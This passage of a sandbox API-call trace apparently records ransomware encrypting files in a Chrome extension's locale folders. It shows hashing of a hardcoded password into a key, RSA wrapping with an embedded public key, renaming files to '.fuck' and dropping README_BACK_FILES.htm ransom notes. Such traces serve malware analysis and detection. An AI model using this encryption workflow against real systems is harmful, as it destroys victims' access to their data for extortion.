0x5d5c [0259.756] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.756] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.758] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.758] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.758] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.758] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.758] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.758] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.759] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d218) returned 1 [0259.759] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d218, dwCertEncodingType=0x1, pInfo=0x2e285d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28600*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28608*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d040) returned 1 [0259.759] CryptEncrypt (in: hKey=0x2e7d040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.759] CryptEncrypt (in: hKey=0x2e7d040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d2a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d2a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.759] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6d2a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d2a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.760] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x32c, lpOverlapped=0x0) returned 1 [0259.761] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x32c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x330) returned 1 [0259.762] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x330, lpOverlapped=0x0) returned 1 [0259.783] CloseHandle (hObject=0x5d60) returned 1 [0259.783] CloseHandle (hObject=0x5d5c) returned 1 [0259.783] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0259.786] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0259.786] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0259.787] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0259.788] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.788] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.788] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.788] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.788] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.788] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0259.788] AreFileApisANSI () returned 1 [0259.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.789] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.789] GetFileType (hFile=0x5d64) returned 0x1 [0259.789] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.790] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.790] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.790] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.791] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.791] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.791] GetLastError () returned 0x0 [0259.791] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json")) returned 0x20 [0259.796] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0259.797] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.797] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.798] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.798] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.800] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.800] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.800] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.800] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.800] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.800] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.800] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d5d0) returned 1 [0259.801] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d5d0, dwCertEncodingType=0x1, pInfo=0x2e28840*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28870*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28878*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cd00) returned 1 [0259.801] CryptEncrypt (in: hKey=0x2e7cd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.801] CryptEncrypt (in: hKey=0x2e7cd00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d658*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d658*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.801] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6d658*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d658*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.802] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x289, lpOverlapped=0x0) returned 1 [0259.803] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x289, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0259.803] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0259.810] CloseHandle (hObject=0x5d5c) returned 1 [0259.810] CloseHandle (hObject=0x5d60) returned 1 [0259.810] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0259.813] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0259.813] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0259.815] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0259.816] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.816] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.816] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.816] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.816] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.817] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0259.817] AreFileApisANSI () returned 1 [0259.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.817] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.818] GetFileType (hFile=0x5d64) returned 0x1 [0259.818] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.819] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.819] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.819] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.819] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.819] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.819] GetLastError () returned 0x0 [0259.819] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json")) returned 0x20 [0259.820] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0259.820] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.821] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.822] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.823] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.825] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.825] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.825] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.825] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.825] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.825] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.825] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d6e0) returned 1 [0259.825] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d6e0, dwCertEncodingType=0x1, pInfo=0x2e28910*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28940*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28948*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cc00) returned 1 [0259.826] CryptEncrypt (in: hKey=0x2e7cc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.826] CryptEncrypt (in: hKey=0x2e7cc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d900*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d900*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.826] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6d900*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d900*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.827] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 